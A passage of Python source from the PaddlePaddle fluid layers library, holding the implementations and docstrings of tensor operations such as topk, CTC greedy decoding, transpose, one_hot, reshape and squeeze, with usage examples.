Values (Variable): Input tensor's k largest elements along each last dimensional slice. The dimension is: :math:`input.shape[:-1]+[k]`.
Indices (Variable): Indices of k largest elements alone the last dimension of input. The dimension is same as values.
Raises:
ValueError: If :math:`k < 1` or :math:`k > last dimension of input`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
# set batch size=None
input = fluid.data(name="input", shape=[None, 13, 11], dtype='float32')
top5_values, top5_indices = layers.topk(input, k=5) # top5_values.shape[None, 13, 5], top5_indices.shape=[None, 13, 5]
# 1D Tensor
input1 = fluid.data(name="input1", shape=[None, 13], dtype='float32')
top5_values, top5_indices = layers.topk(input1, k=5) #top5_values.shape=[None, 5], top5_indices.shape=[None, 5]
# k=Variable
input2 = fluid.data(name="input2", shape=[None, 13, 11], dtype='float32')
vk = fluid.data(name="vk", shape=[None, 1], dtype='int32') # save k in vk.data[0]
vk_values, vk_indices = layers.topk(input2, k=vk) #vk_values.shape=[None, 13, k], vk_indices.shape=[None, 13, k]
"""
if in_dygraph_mode():
_k = k.numpy().item(0) if isinstance(k, Variable) else k
out, indices = core.ops.top_k(input, 'k', _k)
out.stop_gradient = True
indices.stop_gradient = True
return out, indices
inputs = {"X": [input]}
attrs = {}
if isinstance(k, Variable):
inputs['K'] = [k]
else:
attrs = {'k': k}
helper = LayerHelper("top_k", **locals())
values = helper.create_variable_for_type_inference(dtype=input.dtype)
indices = helper.create_variable_for_type_inference(dtype="int64")
helper.append_op(
type="top_k",
inputs=inputs,
outputs={"Out": [values],
"Indices": [indices]},
attrs=attrs)
values.stop_gradient = True
indices.stop_gradient = True
return values, indices
def ctc_greedy_decoder(input,
blank,
input_length=None,
padding_value=0,
name=None):
"""
This op is used to decode sequences by greedy policy by the following steps:
1. Get the indexes of maximum value for each row in input. a.k.a.
numpy.argmax(input, axis=0).
2. For each sequence in result of step1, merge repeated tokens between two
blanks and delete all blanks.
This op is implemented in two modes: lod and padding, either of them can be used.
The input can be either LoDTensor or Tensor, corresponding to lod and padding
mode respectively.
A simple example as below:
.. code-block:: text
Given:
(1) for lod mode:
input.data = [[0.6, 0.1, 0.3, 0.1],
[0.3, 0.2, 0.4, 0.1],
[0.1, 0.5, 0.1, 0.3],
[0.5, 0.1, 0.3, 0.1],
[0.5, 0.1, 0.3, 0.1],
[0.2, 0.2, 0.2, 0.4],
[0.2, 0.2, 0.1, 0.5],
[0.5, 0.1, 0.3, 0.1]]
input.lod = [[4, 4]]
Computation:
step1: Apply argmax to first input sequence which is input.data[0:4]. Then we get:
[[0], [2], [1], [0]]
step2: merge repeated tokens and remove blank which is 0. Then we get first output sequence:
[[2], [1]]
Finally:
output.data = [[2],
[1],
[3]]
output.lod = [[2, 1]]
(2) for padding mode:
input.data = [[[0.6, 0.1, 0.3, 0.1],
[0.3, 0.2, 0.4, 0.1],
[0.1, 0.5, 0.1, 0.3],
[0.5, 0.1, 0.3, 0.1]],
[[0.5, 0.1, 0.3, 0.1],
[0.2, 0.2, 0.2, 0.4],
[0.2, 0.2, 0.1, 0.5],
[0.5, 0.1, 0.3, 0.1]]]
input_length.data = [[4], [4]]
input.shape = [2, 4, 4]
step1: Apply argmax to first input sequence which is input.data[0:4]. Then we get:
[[0], [2], [1], [0]], for input.data[4:8] is [[0], [3], [3], [0]], shape is [2,4,1]
step2: Change the argmax result to use padding mode, then argmax result is
[[0, 2, 1, 0], [0, 3, 3, 0]], shape is [2, 4], lod is [], input_length is [[4], [4]]
step3: Apply ctc_align to padding argmax result, padding_value is 0
Finally:
output.data = [[2, 1, 0, 0],
[3, 0, 0, 0]]
output_length.data = [[2], [1]]
Parameters:
input(Variable): the probabilities of variable-length sequences. When in lod mode,
it is a 2-D LoDTensor with LoD information. It's shape is [Lp, num_classes + 1]
where Lp is the sum of all input sequences' length and
num_classes is the true number of classes. When in padding mode,
it is a 3-D Tensor with padding, It's shape is [batch_size, N, num_classes + 1].
(not including the blank label). The data type can be float32 or float64.
blank(int): the blank label index of Connectionist Temporal
Classification (CTC) loss, which is in the half-opened
interval [0, num_classes + 1).
input_length(Variable, optional): 2-D LoDTensor, shape is [batch_size, 1], data type is int64.
It is used for padding mode. In lod mode, input_length is None.
padding_value(int): padding value.
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
For lod mode, returns the result of CTC greedy decoder, 2-D LoDTensor, shape is [Lp, 1], \
data type is int64. 'Lp' is the sum of all output sequences' length. If all the sequences \
in result were empty, the result LoDTensor will be [-1] with empty \
LoD [[]].
For padding mode, returns a tuple of (output, output_length), which was described as below:
output, 2-D Tensor, shape is [batch_size, N], data type is int64.
output_length, 2-D Tensor, shape is [batch_size, 1], data type is int64. It is the length of \
each sequence of output for padding mode.
Return type:
For lod mode: Variable
For padding mode: tuple of two Variables (output, output_length).
Examples:
.. code-block:: python
# for lod mode
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[None, 8], dtype='float32', lod_level=1)
cost = fluid.layers.ctc_greedy_decoder(input=x, blank=0)
# for padding mode
x_pad = fluid.data(name='x_pad', shape=[10, 4, 8], dtype='float32')
x_pad_len = fluid.data(name='x_pad_len', shape=[10, 1], dtype='int64')
out, out_len = fluid.layers.ctc_greedy_decoder(input=x_pad, blank=0,
input_length=x_pad_len)
"""
helper = LayerHelper("ctc_greedy_decoder", **locals())
_, topk_indices = topk(input, k=1)
# ctc align op
ctc_out = helper.create_variable_for_type_inference(dtype="int64")
if input_length is None:
helper.append_op(
type="ctc_align",
inputs={"Input": [topk_indices]},
outputs={"Output": [ctc_out]},
attrs={"merge_repeated": True,
"blank": blank})
return ctc_out
else:
ctc_out_len = helper.create_variable_for_type_inference(dtype="int64")
ctc_input = squeeze(topk_indices, [2])
helper.append_op(
type="ctc_align",
inputs={"Input": [ctc_input],
"InputLength": [input_length]},
outputs={"Output": [ctc_out],
"OutputLength": [ctc_out_len]},
attrs={
"merge_repeated": True,
"blank": blank,
"padding_value": padding_value
})
return ctc_out, ctc_out_len
def transpose(x, perm, name=None):
"""
Permute the data dimensions of `input` according to `perm`.
The `i`-th dimension of the returned tensor will correspond to the
perm[i]-th dimension of `input`.
Args:
x (Variable): The input Tensor. It is a N-D Tensor of data types float32, float64, int32.
perm (list): Permute the input according to the data of perm.
name (str): The name of this layer. It is optional.
Returns:
Variable: A transposed n-D Tensor, with data type being float32, float64, int32, int64.
For Example:
.. code-block:: text
x = [[[ 1 2 3 4] [ 5 6 7 8] [ 9 10 11 12]]
[[13 14 15 16] [17 18 19 20] [21 22 23 24]]]
shape(x) = [2,3,4]
# Example 1
perm0 = [1,0,2]
y_perm0 = [[[ 1 2 3 4] [13 14 15 16]]
[[ 5 6 7 8] [17 18 19 20]]
[[ 9 10 11 12] [21 22 23 24]]]
shape(y_perm0) = [3,2,4]
# Example 2
perm1 = [2,1,0]
y_perm1 = [[[ 1 13] [ 5 17] [ 9 21]]
[[ 2 14] [ 6 18] [10 22]]
[[ 3 15] [ 7 19] [11 23]]
[[ 4 16] [ 8 20] [12 24]]]
shape(y_perm1) = [4,3,2]
Examples:
.. code-block:: python
# use append_batch_size=False to avoid prepending extra
# batch size in shape
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[2, 3, 4],
dtype='float32', append_batch_size=False)
x_transposed = fluid.layers.transpose(x, perm=[1, 0, 2])
print x_transposed.shape
#(3L, 2L, 4L)
"""
if in_dygraph_mode():
out, _ = core.ops.transpose2(x, 'axis', perm)
return out
check_variable_and_dtype(
x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'],
'transpose')
check_type(perm, 'perm', list, 'transpose')
if len(perm) != len(x.shape):
raise ValueError(
"Input(perm) is the permutation of dimensions of Input(x), "
"its length should be equal to dimensions of Input(x), "
"but received dimension of Input(x) is %s, "
"the length of Input(perm) is %s." % (len(x.shape), len(perm)))
for idx, dim in enumerate(perm):
if dim >= len(x.shape):
raise ValueError(
"Each element in Input(perm) should be less than Input(x)'s dimension, "
"but %d-th element in Input(perm) is %d which exceeds Input(x)'s "
"dimension %d." % (idx, perm[idx], len(x.shape)))
helper = LayerHelper('transpose', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
x_shape = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='transpose2',
inputs={'X': [x]},
outputs={'Out': [out],
'XShape': [x_shape]},
attrs={'axis': perm})
return out
def im2sequence(input,
filter_size=1,
stride=1,
padding=0,
input_image_size=None,
out_stride=1,
name=None):
"""
Extracts image patches from the input tensor to form a tensor of shape
{input.batch_size * output_height * output_width, filter_size_height *
filter_size_width * input.channels}. This op use filter to scan images
and convert these images to sequences. After expanding, the number of time step are
output_height * output_width for an image, in which output_height and
output_width are calculated by below equation:
.. math::
output\_height = 1 + \
(padding\_up + padding\_down + input\_height - filter\_size\_height + stride\_height - 1) / stride\_height \\\\
output\_width = 1 + \
(padding\_left + padding\_right + input\_width - filter\_size\_width + stride\_width - 1) / stride\_width
And the dimension of each time step is filter_size_height * filter_size_width * input.channels.
Parameters:
input (Variable): The input should be a 4-D Tensor in :math:`NCHW` format. The data type is float32.
filter_size(int32 | List[int32]): The filter size. If filter_size is a List,
it must contain two integers, :math:`[filter\_size\_height, filter\_size\_width]` .
Otherwise, the filter size will be a square :math:`[filter\_size, filter\_size]` . Default is 1.
stride(int32 | List[int32]): The stride size. If stride is a List, it must
contain two integers, :math:`[stride\_height, stride\_width]` . Otherwise, the stride size will be a square :math:`[stride\_size, stride\_size]` . Default is 1.
padding(int32 | List[int32]): The padding size. If padding is a List, it can
contain four integers like :math:`[padding\_up, padding\_left, padding\_down, padding\_right]` to indicate
paddings of four direction. Or it can contain two integers :math:`[padding\_height, padding\_width]` which means
padding_up = padding_down = padding_height and
padding_left = padding_right = padding_width. Otherwise, a scalar padding means
padding_up = padding_down = padding_left = padding_right = padding.
Default is 0.
input_image_size(Variable, optional): the input contains image real size.It's dim
is :math:`[batchsize, 2]` . It is just for batch inference when not None. Default is None.
out_stride(int32 | List[int32]): The scaling of image through CNN. It is valid only when input_image_size is not None.
If out_stride is List, it must contain two integers,
:math:`[out\_stride\_height, out\_stride\_W]` . Otherwise,
the out_stride_height = out_stride_width = out_stride. Default is 1.
name (str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
The output is a 2-D LoDTensor with shape {input.batch\_size * output\_height * output\_width, \
filter\_size\_height * filter\_size\_width * input.channels}. The data type is float32.
Return Type: Variable
Examples:
.. code-block:: text
Given:
x = [[[[ 6. 2. 1.]
[ 8. 3. 5.]
[ 0. 2. 6.]]
[[ 2. 4. 4.]
[ 6. 3. 0.]
[ 6. 4. 7.]]]
[[[ 6. 7. 1.]
[ 5. 7. 9.]
[ 2. 4. 8.]]
[[ 1. 2. 1.]
[ 1. 3. 5.]
[ 9. 0. 8.]]]]
x.dims = {2, 2, 3, 3}
And:
filter = [2, 2]
stride = [1, 1]
padding = [0, 0]
Then:
output.data = [[ 6. 2. 8. 3. 2. 4. 6. 3.]
[ 2. 1. 3. 5. 4. 4. 3. 0.]
[ 8. 3. 0. 2. 6. 3. 6. 4.]
[ 3. 5. 2. 6. 3. 0. 4. 7.]
[ 6. 7. 5. 7. 1. 2. 1. 3.]
[ 7. 1. 7. 9. 2. 1. 3. 5.]
[ 5. 7. 2. 4. 1. 3. 9. 0.]
[ 7. 9. 4. 8. 3. 5. 0. 8.]]
output.dims = {8, 8}
output.lod = [[4, 4]]
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32],
dtype='float32')
output = fluid.layers.im2sequence(
input=data, stride=[1, 1], filter_size=[2, 2])
"""
assert not in_dygraph_mode(), (
"sequence layer is not supported in dygraph mode yet.")
if isinstance(filter_size, int):
filter_size = [filter_size, filter_size]
if isinstance(stride, int):
stride = [stride, stride]
if isinstance(padding, int):
padding = [padding, padding]
if len(padding) == 2:
padding.append(padding[0])
padding.append(padding[1])
inputs = {"X": input}
attrs = {"kernels": filter_size, "strides": stride, "paddings": padding}
if input_image_size:
if isinstance(out_stride, int):
out_stride = [out_stride, out_stride]
inputs["Y"] = input_image_size
attrs["out_stride"] = out_stride
helper = LayerHelper('im2sequence', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
helper.append_op(
type='im2sequence', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
@templatedoc()
def row_conv(input, future_context_size, param_attr=None, act=None):
"""
${comment}
Args:
input (${x_type}): ${x_comment}.
future_context_size (int): Future context size. Please note, the shape
of convolution kernel is [future_context_size + 1, D].
param_attr (ParamAttr): Attributes of parameters, including
name, initializer etc.
act (str): Non-linear activation to be applied to output variable.
Returns:
${out_comment}.
Examples:
>>> # for LodTensor inputs
>>> import paddle.fluid as fluid
>>> x = fluid.data(name='x', shape=[9, 16],
>>> dtype='float32', lod_level=1)
>>> out = fluid.layers.row_conv(input=x, future_context_size=2)
>>> # for Tensor inputs
>>> x = fluid.data(name='x', shape=[9, 4, 16], dtype='float32')
>>> out = fluid.layers.row_conv(input=x, future_context_size=2)
"""
helper = LayerHelper('row_conv', **locals())
dtype = helper.input_dtype()
filter_shape = [future_context_size + 1, input.shape[-1]]
filter_param = helper.create_parameter(
attr=helper.param_attr, shape=filter_shape, dtype=dtype)
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='row_conv',
inputs={'X': [input],
'Filter': [filter_param]},
outputs={'Out': [out]})
return helper.append_activation(out)
@templatedoc()
def multiplex(inputs, index):
"""
Based on the given index parameter, the OP selects a specific row from each input Tensor to construct the output Tensor.
If the input of this OP contains :math:`m` Tensors, where :math:`I_{i}` means the i-th input Tensor, :math:`i` between :math:`[0,m)` .
And :math:`O` means the output, where :math:`O[i]` means the i-th row of the output, then the output satisfies that :math:`O[i] = I_{index[i]}[i]` .
For Example:
.. code-block:: text
Given:
inputs = [[[0,0,3,4], [0,1,3,4], [0,2,4,4], [0,3,3,4]],
[[1,0,3,4], [1,1,7,8], [1,2,4,2], [1,3,3,4]],
[[2,0,3,4], [2,1,7,8], [2,2,4,2], [2,3,3,4]],
[[3,0,3,4], [3,1,7,8], [3,2,4,2], [3,3,3,4]]]
index = [[3],[0],[1],[2]]
out = [[3,0,3,4], # out[0] = inputs[index[0]][0] = inputs[3][0] = [3,0,3,4]
[0,1,3,4], # out[1] = inputs[index[1]][1] = inputs[0][1] = [0,1,3,4]
[1,2,4,2], # out[2] = inputs[index[2]][2] = inputs[1][2] = [1,2,4,2]
[2,3,3,4]] # out[3] = inputs[index[3]][3] = inputs[2][3] = [2,3,3,4]
Args:
inputs (list): The input Tensor list. The list elements are N-D Tensors of data types float32, float64, int32, int64. All input Tensor shapes should be the same and rank must be at least 2.
index (Variable): Used to select some rows in the input Tensor to construct an index of the output Tensor. It is a 2-D Tensor with data type int32 or int64 and shape [M, 1], where M is the number of input Tensors.
Returns:
Variable(Tensor): Output of multiplex OP, with data type being float32, float64, int32, int64.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
x1 = fluid.data(name='x1', shape=[None, 2], dtype='float32')
x2 = fluid.data(name='x2', shape=[None, 2], dtype='float32')
index = fluid.data(name='index', shape=[None, 1], dtype='int32')
out = fluid.layers.multiplex(inputs=[x1, x2], index=index)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
img1 = np.array([[1, 2], [3, 4]]).astype(np.float32)
img2 = np.array([[5, 6], [7, 8]]).astype(np.float32)
index = np.array([[1], [0]]).astype(np.int32)
res = exe.run(fluid.default_main_program(), feed={'x1':img1, 'x2':img2, 'index':index}, fetch_list=[out])
print(res) # [array([[5., 6.], [3., 4.]], dtype=float32)]
"""
helper = LayerHelper('multiplex', **locals())
if not isinstance(inputs, list) and len(inputs) < 2:
raise ValueError("inputs should be a list object and contains at least "
"2 elements.")
out = helper.create_variable_for_type_inference(inputs[0].dtype)
helper.append_op(
type='multiplex',
inputs={'X': inputs,
'Ids': index},
outputs={'Out': [out]})
return out
def smooth_l1(x, y, inside_weight=None, outside_weight=None, sigma=None):
"""
This layer computes the smooth L1 loss for Variable :attr:`x` and :attr:`y`.
It takes the first dimension of :attr:`x` and :attr:`y` as batch size.
For each instance, it computes the smooth L1 loss element by element first
and then sums all the losses. So the shape of output Variable is
[batch_size, 1].
Args:
x (Variable): A tensor with rank at least 2. The input value of smooth
L1 loss op with shape [batch_size, dim1, ..., dimN].
A LoDTensor or Tensor with type float32.
y (Variable): A tensor with rank at least 2. The target value of smooth
L1 loss op with same shape as :attr:`x`.
A LoDTensor or Tensor with type float32.
inside_weight (Variable|None): A tensor with rank at least 2. This
input is optional and should have same shape with :attr:`x`. If
provided, the result of (:attr:`x` - :attr:`y`) will be multiplied
by this tensor element by element.
A Tensor with type float32.
outside_weight (Variable|None): A tensor with rank at least 2. This
input is optional and should have same shape with :attr:`x`. If
provided, the out smooth L1 loss will be multiplied by this tensor
element by element.
A Tensor with type float32.
sigma (float|None): Hyper parameter of smooth L1 loss layer. A float
scalar with default value 1.0.
Returns:
Variable: The output smooth L1 loss with shape [batch_size, 1]. A Tensor with type float32.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
data = fluid.data(name="x", shape=[-1, 3], dtype="float32")
label = fluid.data(name="y", shape=[-1, 3], dtype="float32")
result = fluid.layers.smooth_l1(data,label)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
x = np.random.rand(3,3).astype("float32")
y = np.random.rand(3,3).astype("float32")
output= exe.run(feed={"x":x, "y":y},
fetch_list=[result])
print(output)
#[array([[0.08220536],
# [0.36652038],
# [0.20541131]], dtype=float32)]
"""
helper = LayerHelper('smooth_l1_loss', **locals())
diff = helper.create_variable_for_type_inference(dtype=x.dtype)
loss = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='smooth_l1_loss',
inputs={
'X': x,
'Y': y,
'InsideWeight': inside_weight,
'OutsideWeight': outside_weight
},
outputs={'Diff': diff,
'Out': loss},
attrs={'sigma': sigma if sigma is not None else 1.0})
return loss
def one_hot(input, depth, allow_out_of_range=False):
"""
**WARING:** This OP requires the last dimension of Tensor shape must be equal to 1.
This OP will be deprecated in a future release. It is recommended to use fluid. :ref:`api_fluid_one_hot` .
The operator converts each id in the input to an one-hot vector with a
:attr:`depth` length. The value in the vector dimension corresponding to the id
is 1, and the value in the remaining dimension is 0.
The shape of output Tensor or LoDTensor is generated by adding :attr:`depth` dimension
behind the last dimension of the input shape.
.. code-block:: text
Example 1 (allow_out_of_range=False):
input:
X.shape = [4, 1]
X.data = [[1], [1], [3], [0]]
depth = 4
output:
Out.shape = [4, 4]
Out.data = [[0., 1., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 1.],
[1., 0., 0., 0.]]
Example 2 (allow_out_of_range=True):
input:
X.shape = [4, 1]
X.data = [[1], [1], [5], [0]]
depth = 4
allow_out_of_range = True
output:
Out.shape = [4, 4]
Out.data = [[0., 1., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.], # This id is 5, which goes beyond depth, so set it all-zeros data.
[1., 0., 0., 0.]]
Example 3 (allow_out_of_range=False):
input:
X.shape = [4, 1]
X.data = [[1], [1], [5], [0]]
depth = 4
allow_out_of_range = False
output: Throw an exception for Illegal value
The second dimension in X is 5, which is greater than depth.
Allow_out_of_range =False means that does not allow the word id to exceed depth,
so it throws an exception.
Args:
input(Variable): Tensor or LoDTensor with shape :math:`[N_1, N_2, ..., N_k, 1]` ,
which contains at least one dimension and the last dimension must be 1.
The data type is int32 or int64.
depth(scalar): An integer defining the :attr:`depth` of the one hot dimension. If input
is word id, depth is generally the dictionary size.
allow_out_of_range(bool): A bool value indicating whether the input
indices could be out of range :math:`[0, depth)` . When input indices are
out of range, exceptions :code:`Illegal value` is raised if :attr:`allow_out_of_range`
is False, or zero-filling representations is created if it is set True.
Default: False.
Returns:
Variable: The one-hot representations of input. A Tensor or LoDTensor with type float32.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# Correspond to the first example above, where label.shape is [4, 1] and one_hot_label.shape is [4, 4].
label = fluid.data(name="label", shape=[4, 1], dtype="int64")
one_hot_label = fluid.layers.one_hot(input=label, depth=4)
"""
if in_dygraph_mode():
if isinstance(depth, Variable):
depth = depth.numpy()
assert depth.shape == (
1, ), "depth of type Variable should have shape [1]"
depth = depth[0]
out = core.ops.one_hot(input, 'depth', depth, 'allow_out_of_range',
allow_out_of_range)
out.stop_gradient = True
return out
helper = LayerHelper("one_hot", **locals())
one_hot_out = helper.create_variable_for_type_inference(dtype='float32')
if not isinstance(depth, Variable):
# user attribute
inputs = {'X': input}
attrs = {'depth': depth, 'allow_out_of_range': allow_out_of_range}
else:
depth.stop_gradient = True
inputs = {'X': input, 'depth_tensor': depth}
attrs = {'allow_out_of_range': allow_out_of_range}
helper.append_op(
type="one_hot",
inputs=inputs,
attrs=attrs,
outputs={'Out': one_hot_out})
one_hot_out.stop_gradient = True
return one_hot_out
def autoincreased_step_counter(counter_name=None, begin=1, step=1):
"""
Create an auto-increase variable. which will be automatically increased
by 1 in every iteration. By default, the first return of this counter is 1,
and the step size is 1.
Args:
counter_name(str, optional): The counter name. Default '@STEP_COUNTER@'.
begin(int, optional): The first return value of this counter. Default 1.
step(int, optional): The step size. Default 1.
Returns:
Variable: The auto-increased Variable with data type int64.
Examples:
.. code-block:: python
import paddle.fluid as fluid
global_step = fluid.layers.autoincreased_step_counter(
counter_name='@LR_DECAY_COUNTER@', begin=0, step=1)
"""
helper = LayerHelper('global_step_counter')
if counter_name is None:
counter_name = '@STEP_COUNTER@'
counter, is_new_var = helper.create_or_get_global_variable(
name=counter_name,
dtype='int64',
shape=[1],
persistable=True,
belong_to_optimizer=True)
if is_new_var:
helper.set_variable_initializer(
counter, initializer=Constant(
value=begin - 1, force_cpu=True))
helper.main_program.global_block()._prepend_op(
type='increment',
inputs={'X': [counter]},
outputs={'Out': [counter]},
attrs={'step': float(step)})
counter.stop_gradient = True
return counter
def reshape(x, shape, actual_shape=None, act=None, inplace=False, name=None):
"""
This operator changes the shape of ``x`` without changing its data.
The target shape can be given by ``shape`` or ``actual_shape``.
When ``shape`` and ``actual_shape`` are set at the same time,
``actual_shape`` has a higher priority than ``shape``
but at this time ``shape`` can only be an integer list or tuple, and ``shape`` still should be set correctly to
guarantee shape inference in compile-time.
Some tricks exist when specifying the target shape.
1. -1 means the value of this dimension is inferred from the total element
number of x and remaining dimensions. Thus one and only one dimension can
be set -1.
2. 0 means the actual dimension value is going to be copied from the
corresponding dimension of x. The index of 0s in shape can not exceed
the dimension of x.
Here are some examples to explain it.
1. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
is [6, 8], the reshape operator will transform x into a 2-D tensor with
shape [6, 8] and leaving x's data unchanged.
2. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
specified is [2, 3, -1, 2], the reshape operator will transform x into a
4-D tensor with shape [2, 3, 4, 2] and leaving x's data unchanged. In this
case, one dimension of the target shape is set to -1, the value of this
dimension is inferred from the total element number of x and remaining
dimensions.
3. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
is [-1, 0, 3, 2], the reshape operator will transform x into a 4-D tensor
with shape [2, 4, 3, 2] and leaving x's data unchanged. In this case,
besides -1, 0 means the actual dimension value is going to be copied from
the corresponding dimension of x.
**Note**:
The parameter ``actual_shape`` will be deprecated in the future and only use ``shape`` instead to represent the target shape.
Args:
x(Variable): A ``Tensor`` or ``LoDTensor`` . The data type is ``float32``, ``float64``, ``int32`` or ``int64``.
shape(list|tuple|Variable): Define the target shape. At most one dimension of the target shape can be -1.
The data type is ``int32`` . If ``shape`` is a list or tuple, the elements of it should be integers or Tensors with shape [1].
If ``shape`` is an Variable, it should be an 1-D Tensor .
actual_shape(variable, optional): An 1-D ``Tensor`` or ``LoDTensor`` . The data type is ``int32`` . If provided, reshape
according to this given shape rather than ``shape`` specifying shape.
That is to say ``actual_shape`` has a higher priority
than ``shape(list|tuple)`` but not ``shape(Variable)``. \
This argument ``actual_shape`` will be removed in a future version. \
Instructions for updating: ``actual_shape`` will be removed in future versions and replaced by ``shape``.
act (str, optional): The non-linear activation to be applied to the reshaped input. Default None.
inplace(bool, optional): If ``inplace`` is True, the input and output of ``layers.reshape``
are the same variable. Otherwise, the input and output of
``layers.reshape`` are different variable. Default False. Note that if ``x``
is more than one OPs' input, ``inplace`` must be False.
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: A ``Tensor`` or ``LoDTensor``. The data type is same as ``x``. It is a new tensor variable if ``inplace`` is ``False``, otherwise it is ``x``. If ``act`` is None, return the reshaped tensor variable, otherwise return the activated tensor variable.
Raises:
TypeError: If actual_shape is neither Variable nor None.
ValueError: If more than one elements of ``shape`` is -1.
ValueError: If the element of ``shape`` is 0, the corresponding dimension should be less than or equal to the dimension of ``x``.
ValueError: If the elements in ``shape`` is negative except -1.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# example 1:
# attr shape is a list which doesn't contain tensor Variable.
data_1 = fluid.data(
name='data_1', shape=[2, 4, 6], dtype='float32')
reshaped_1 = fluid.layers.reshape(
x=data_1, shape=[-1, 0, 3, 2], inplace=True)
# the shape of reshaped_1 is [2,4,3,2].
# example 2:
# attr shape is a list which contains tensor Variable.
data_2 = fluid.layers.fill_constant([2,25], "int32", 3)
dim = fluid.layers.fill_constant([1], "int32", 5)
reshaped_2 = fluid.layers.reshape(data_2, shape=[dim, 10])
# the shape of reshaped_2 is [5,10].
# example 3:
data_3 = fluid.data(
name="data_3", shape=[2,4,6], dtype='float32')
reshaped_3 = fluid.layers.reshape(x=data_3, shape=[6,8])
# the shape of reshaped_3 is [6,8].
"""
if in_dygraph_mode():
#TODO(zhiqiu): enable inplace in dygraph mode.
if inplace:
warnings.warn(
"Inplace on reshape is not allowed and will be discarded in dygraph mode currently."
)
attrs = {}
if isinstance(shape, (list, tuple)):
if utils._contain_var(shape):
raise TypeError(
"The type of 'shape' in reshape must be list[int] or tuple(int) in Dygraph mode, but "
"received %s, which contains Variable." % type(shape))
attrs['shape'] = shape
else:
raise TypeError(
"The type of 'shape' in reshape must be list[int] or tuple(int) in Dygraph mode, but "
"received %s." % type(shape))
out, _ = core.ops.reshape2(x, 'shape', shape)
return dygraph_utils._append_activation_in_dygraph(out, act)
check_variable_and_dtype(
x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'], 'reshape')
check_type(shape, 'shape', (list, tuple, Variable), 'reshape')
check_type(actual_shape, 'actual_shape', (Variable, type(None)), 'reshape')
helper = LayerHelper("reshape2", **locals())
def get_new_shape_tensor(list_shape):
new_shape_tensor = []
for dim in list_shape:
if isinstance(dim, Variable):
dim.stop_gradient = True
new_shape_tensor.append(dim)
else:
assert (isinstance(dim, int))
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant([1], 'int32', dim, force_cpu=True, out=temp_out)
new_shape_tensor.append(temp_out)
return new_shape_tensor
def get_attr_shape(list_shape):
unk_dim_idx = -1
attrs_shape = []
for dim_idx, dim_size in enumerate(list_shape):
if isinstance(dim_size, Variable):
attrs_shape.append(-1)
else:
attrs_shape.append(dim_size)
if dim_size == -1:
assert unk_dim_idx == -1, (
"Only one dimension value of 'shape' in reshape can "
"be -1. But received shape[%d] is also -1." % dim_idx)
unk_dim_idx = dim_idx
elif dim_size == 0:
assert dim_idx < len(x.shape), (
"The index of 0 in `shape` must be less than "
"the input tensor X's dimensions. "
"But received shape[%d] = 0, X's dimensions = %d." %
(dim_idx, len(x.shape)))
else:
assert dim_size > 0, (
"Each dimension value of 'shape' in reshape must not "
"be negative except one unknown dimension. "
"But received shape[%d] = %s." %
(dim_idx, str(dim_size)))
return attrs_shape
inputs = {"X": x}
attrs = {}
if isinstance(shape, Variable):
shape.stop_gradient = True
inputs["Shape"] = shape
elif isinstance(shape, (list, tuple)):
assert len(shape) > 0, ("The size of 'shape' in reshape can't be zero, "
"but received %s." % len(shape))
attrs["shape"] = get_attr_shape(shape)
if utils._contain_var(shape):
inputs['ShapeTensor'] = get_new_shape_tensor(shape)
elif isinstance(actual_shape, Variable):
actual_shape.stop_gradient = True
inputs["Shape"] = actual_shape
out = x if inplace else helper.create_variable_for_type_inference(
dtype=x.dtype)
x_shape = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="reshape2",
inputs=inputs,
attrs=attrs,
outputs={"Out": out,
"XShape": x_shape})
return helper.append_activation(out)
def squeeze(input, axes, name=None):
"""
This OP will squeeze single-dimensional entries of input tensor's shape. If axes is provided, will
remove the dims by axes, the dims selected by axes should be one. If not provide axes, all dims equal
to one will be deleted.
.. code-block:: text
Case1:
Input:
X.shape = (1, 3, 1, 5)
axes = [0]
Output:
Out.shape = (3, 1, 5)
Case2:
Input:
X.shape = (1, 3, 1, 5)
axes = []
Output:
Out.shape = (3, 5)
Case3:
Input:
X.shape = [1,3,1,5]
axes = [-2]
Output:
Out.shape = [1,3,5]
Args:
input (Variable): The input Tensor. Support data type: float32, float64, int8, int32, int64.
axes (list): One integer or List of integers, indicating the dimensions to be squeezed.
Axes range is :math:`[-rank(input), rank(input))`.
If axes is negative, :math:`axes=axes+rank(input)`.
name (str, optional): Please refer to :ref:`api_guide_Name`, Default None.
Returns:
Variable: Output squeezed Tensor. Data type is same as input Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
# set batch size=None
x = fluid.data(name='x', shape=[None, 5, 1, 10])
y = layers.squeeze(input=x, axes=[2]) # y.shape=[None, 5, 10]
"""
helper = LayerHelper("squeeze", **locals())
check_variable_and_dtype(input, 'input',
